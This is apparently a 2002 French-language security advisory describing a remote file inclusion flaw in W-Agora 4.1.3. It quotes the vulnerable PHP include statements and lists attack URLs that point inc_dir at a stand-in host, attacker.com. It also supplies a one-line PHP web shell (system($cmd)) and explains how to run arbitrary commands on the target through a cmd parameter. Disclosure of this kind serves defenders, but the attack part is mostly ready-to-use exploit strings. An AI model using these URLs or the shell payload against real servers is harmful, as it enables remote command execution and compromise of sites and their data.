W-Agora
					*******

Produit :
*********
W-Agora
http://www.w-agora.net

Version :
*********
4.1.3

Date :
******
08 Juin 2002

Problème :
**********
- Inclusion de fichiers

Developpement :
***************
8 fichiers ont une faille permettant d'inclure un fichier du type que l'on veut dans le site.
Ainsi on peut voir dans /include/oci8.php :
----------------------------------------------
if (!isset($DBACCESS)) {
	include ("$inc_dir/dbaccess.$ext");
}
----------------------------------------------

Dans /include/postgres65.php, /include/mysql.php, /include/mssql7.php et /include/msql.php :
----------------------------------------------
if (!defined("_DBACCESS")) {
	include ("$inc_dir/dbaccess.$ext");
}
----------------------------------------------

Dans /include/postgres.php :
----------------------------------------------
 if (!defined("_PG65_ACCESS")) {
	include ("$inc_dir/postgres65.$ext");
 }
----------------------------------------------

Et enfin dans /user/agora_user.php et /user/ldap_example.php :
----------------------------------------------
if (!defined("_AUTH")) {
	include ("$inc_dir/auth.$ext");
}
----------------------------------------------


On inclura donc le fichier http://www.attacker.com/dbaccess.txt avec les urls :
http://[target]/include/oci8.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/include/postgres65.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/include/mysql.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/include/mssql7.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/include/msql.php?inc_dir=http://www.attacker.com&ext=txt

Le fichier http://www.attacker.com/postgres65.txt avec l'url :
http://[target]/include/postgres.php?inc_dir=http://www.attacker.com&ext=txt

Et le fichier http://www.attacker.com/auth.txt avec l'url :
http://[target]/user/agora_user.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/user/ldap_example.php?inc_dir=http://www.attacker.com&ext=txt

Si les fichiers textes sur attacker.com ont comme contenu :
--------------
<?
system($cmd);
?>
--------------
Il suffira de rajouter &cmd=[COMMANDE e.g. "ls" ] à l'url pour executer cette commande.

Greetz :
********
Je dédicasse ce texte au beau couple que forment Fight-Spirit et Bl@ck.

Credits :
*********
frog-m@n
leseulfrog@hotmail.com